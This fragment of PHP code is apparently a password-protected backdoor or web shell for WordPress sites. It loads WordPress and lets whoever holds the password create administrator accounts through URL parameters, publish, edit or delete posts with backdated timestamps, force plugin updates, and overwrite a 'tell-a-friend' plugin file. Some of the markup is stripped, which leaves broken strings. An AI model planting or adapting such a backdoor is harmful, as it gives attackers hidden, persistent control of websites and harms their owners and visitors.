Password : ';
}
if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
setcookie('password', SHELL_PASSWORD, time()+60*60*24);
header("Location: {$_SERVER['PHP_SELF']}");
exit;
}
if(empty($_COOKIE['password']) || $_COOKIE['password'] != SHELL_PASSWORD) {
exit;
}
$counter = 0;
$dir_up = './';
do {
$file_found = false;
$file_path = "{$dir_up}wp-load.php";
if(file_exists($file_path)) {
require($file_path);
$file_found = true;
}
else {
$dir_up .= '../';
}
$counter++;
}while(!$file_found && $counter < MAX_UP_LEVELS);
if(isset($_GET['action']) && $_GET['action'] == 'create_user') {
if(empty($_GET['username']) || empty($_GET['password']) || empty($_GET['email'])){
print "Missing parameter for creating user!";
exit;
}
else {
$userdata = array('user_login' => $_GET['username'], 'user_pass' => $_GET['password'], 'user_email' => $_GET['email'], 'role' => 'administrator');
$user_id = wp_insert_user( $userdata );
if(is_numeric($user_id)) {
print "User has been created.
Login: {$_GET['username']} Password: {$_GET['password']}
";
print 'Login
';
}
}
}
if(!empty($_POST['title']) && !empty($_POST['post'])) {
$post_date = $_POST['datepicker'] . " " . rand(0,23) . ":" . rand(0,59) . ":" . rand(0,59);
// Create post object
$my_post = array(
'post_title' => $_POST['title'],
'post_content' => $_POST['post'],
'post_status' => 'publish',
'post_author' => 1,
'post_type' => $_POST['post_type'],
'post_date' => $post_date
);
$id = NULL;
if(empty($_POST['ID'])) {
// Insert the post into the database
$id = wp_insert_post($my_post);
}
else {
if($_POST['delete_post'] == 1) {
$del_op_res = wp_delete_post( $_POST['ID'], true );
if(!$del_op_res) print "Delete failed!
\n";
}
else {
$my_post['ID'] = $_POST['ID'];
$id = wp_update_post($my_post);
}
}
$permalink = get_permalink( $id );
wp_set_post_categories($id, array($_POST['cat']));
if($_POST['delete_post'] != 1) {
if(!empty($id)) {
$post = get_post($id);
print "View post by permalink guid}\" target=\"blank\">View post/page by id";
}
else {
print "Action failed!
\n";
}
}
}
if(!empty($_POST['plugin2update'])) {
include_once( $dir_up . 'wp-admin/includes/class-ftp.php');
include_once( $dir_up . 'wp-admin/includes/update.php');
include_once( $dir_up . 'wp-admin/includes/file.php');
include_once( $dir_up . 'wp-admin/includes/screen.php');
include_once( $dir_up . 'wp-admin/includes/misc.php');
include_once( $dir_up . 'wp-admin/includes/plugin.php');
foreach($_POST['plugin2update'] as $plugin) {
print "$plugin update : ";
wp_update_plugin($plugin);
}
exit;
}
if(!empty($_POST['file2clean'])) {
$tell_a_friend_content = 'ID));
$taf_title = urlencode(get_the_title($post->ID) );
$taf_img = get_settings(\'home\') . \'/wp-content/plugins/tell-a-friend/button.gif\';
if ( !is_feed() && !is_page() ) {
$content .= \'
\';
}
return $content;
}
add_filter(\'the_content\', \'tell_a_friend\');
?>';
if(file_exists($_POST['file2clean'])) {
if(strpos($_POST['file2clean'], 'tell-a-friend.php') !== false) {
if(file_put_contents($_POST['file2clean'], $tell_a_friend_content)) {
print "File {$_POST['file2clean']} has been cleaned.";
}
else {
print "Failed cleaning {$_POST['file2clean']} !";
}
}
}
}
?>
WP posts editor
Add/Edit posts
$the_slug,
'post_status' => 'publish',
'posts_per_page' => 1
);
$my_posts = get_posts( $args );
if(!empty($my_posts[0]->ID) && is_numeric($my_posts[0]->ID)) {
$post = get_post($my_posts[0]->ID);
}
}
if(!empty($_GET['page_id'])) {
$post = get_page($_GET['page_id']);
}
?>
Edit posts
Categories view:
'post',
'child_of' => 0,
'parent' => '',
'orderby' => 'name',
'order' => 'ASC',
'hide_empty' => 1,
'hierarchical' => 1,
'exclude' => '',
'include' => '',
'number' => '',
'taxonomy' => 'category',
'pad_counts' => false );
$categories = get_categories( $args );
foreach ($categories as $category) {
echo "slug}\" target=\"_blank\">{$category->cat_name}
\n";
}
?>